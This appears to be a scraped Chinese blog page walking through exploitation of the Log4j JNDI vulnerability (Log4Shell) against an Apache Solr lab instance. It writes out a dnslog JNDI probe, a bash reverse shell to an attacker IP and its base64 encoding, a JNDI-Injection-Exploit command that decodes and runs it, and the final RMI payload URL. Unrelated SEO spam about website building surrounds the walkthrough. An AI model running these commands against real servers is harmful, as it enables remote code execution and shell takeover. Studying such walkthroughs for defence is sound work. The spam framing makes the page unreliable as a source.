当前位置: 首页 > news >正文

盐城网站建设多少钱qq群引流推广软件

盐城网站建设多少钱,qq群引流推广软件,网站排名必做阶段性seo策略,牛商网抖音培训靠谱吗一、漏洞特征 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的…

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

http://www.zhongyajixie.com/news/28850.html

相关文章:

  • 企业质量文化建设做网站建设优化的公司排名
  • 肃宁做网站价格自动引流推广软件
  • 佛山seo管理百家号关键词排名优化
  • 怎么做网站的防盗链网络营销与传统营销的区别
  • 网站开发技术部绩效考核推广项目
  • 潍坊营销型网站网址推荐
  • 服装设计学校十大排名全网营销与seo
  • 免费舆情网站直接打开安徽seo
  • 网站专栏的作用互联网品牌营销公司
  • 做pc端网站适配app推广软件有哪些
  • 网站系统管理员网站一键生成
  • dz怎么做视频网站郑州百度分公司
  • 做暧暧小视频有声音的网站常见的推广平台有哪些
  • 广东网站开发项目指数计算器
  • 做ppt时网站怎么设计域名查询seo
  • 毕业论文引用网站数据怎么做脚注自动收录
  • 湖南网站建设哪家专业郑州seo实战培训
  • 旅游网站建设成本核算没被屏蔽的国外新闻网站
  • 怎么制作一个国外网站友链是什么
  • 如何服务器ip地址做网站防控措施持续优化
  • 建筑设计经典案例分析如何seo推广
  • app会替代网站吗网络课程
  • 建筑工程类网站优化王
  • 深圳做公司网站推广的关键词全网搜索
  • 用四字成语做网站域名好吗企业网络推广最简单方法
  • 谭八爷网站开发南阳网站优化公司
  • 网站建设哪家好全网营销一站式推广
  • 好的做外贸的网站有哪些网络媒体
  • 镇江网页设计师招聘手机端seo
  • 新闻网站如何做推广百度sem竞价推广